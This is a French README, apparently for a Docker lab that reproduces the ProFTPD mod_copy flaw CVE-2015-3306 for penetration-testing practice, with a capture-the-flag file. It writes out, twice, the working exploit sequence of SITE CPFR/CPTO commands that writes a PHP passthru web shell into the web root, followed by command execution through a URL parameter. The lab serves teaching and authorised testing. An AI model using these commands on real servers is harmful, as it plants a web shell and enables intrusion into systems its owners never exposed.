CVE-2015-3306 - ProFTPD - Configuration d'un laboratoire local RCE (Docker) facile à utiliser pour le Red Teaming ou les Tests de Pénétration
Ce laboratoire a été conçu pour simuler la vulnérabilité CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE
Il est utilisé pour apprendre l’injection de Web Shell RCE via le module mod_copy de ProFTPD.
mod_copy (SITE CPFR / SITE CPTO)/var/www/htmlflag_RANDOM.txt à chaque démarrage du conteneur/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh
docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php
Ouvrir via le navigateur :
http://<IP>/webshell.php?cmd=<commande>
Stocké dans :
/tmp/flag_RANDOM.txt
Ce laboratoire simule CVE-2015-3306 en utilisant ProFTPD 1.3.5 avec mod_copy, permettant aux attaquants d’effectuer une copie de fichier distante vers RCE via ProFTPD mod_copy.
mod_copy (SITE CPFR + SITE CPTO)flag_RANDOM.txt au démarrage du conteneurnc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php
Puis exécuter :
http://<IP>/webshell.php?cmd=<commande>
/tmp/flag_RANDOM.txt
À des fins éducatives et de tests d’intrusion autorisés uniquement.